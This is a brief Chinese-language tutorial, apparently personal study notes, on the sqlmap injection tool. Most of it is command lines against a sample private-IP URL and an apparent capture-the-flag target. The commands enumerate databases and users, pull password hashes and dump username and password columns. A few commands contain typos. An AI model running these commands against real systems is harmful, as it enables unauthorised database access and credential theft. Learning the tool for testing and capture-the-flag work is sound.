sqlmap使用

sqlmap使用:
注入类型有四种分别为:

boolean-based blind
error-based
stacked queries
inline query

cmd操作:

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py

后,加下面的操作
#-u 注入点 检测注入点是否可用
#曝出该sqlserver中所有数据库名称

-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --dbs

#web当前使用的数据库

-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-db   

#web数据库使用账户

-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-user

#列出sql所有用户

-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --users

#数据库用户密码

-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --passwords

#输出所有的表

-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --tables

#-D 指定数据库名

-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 --tables  

#-T:指定要列出字段的表 --columns 列出了所有的列字段

-u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 -T 【表名】 --columns 

# -C :指定要暴的字段  --dump:将结果导出

qlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 -T 【表名】 -C "username,realname,password" --dump 

以上为GET传参-u ‘http://192.168.87.19/index.php?r=default/news/content&id=12’,以下为POST传参-u “http://123.206.87.240:8002/chengjidan/index.php” “id=1”,注意参数id的方式不同,其他操作一样

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py  -u "http://123.206.87.240:8002/chengjidan/index.php" --data "id=1" -D skctf_flag -T fl4g -C "skctf_flag" --dump

配合sqlmap导出的网址txt进行注册

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name --dbs

你可能感兴趣的:(学习归纳)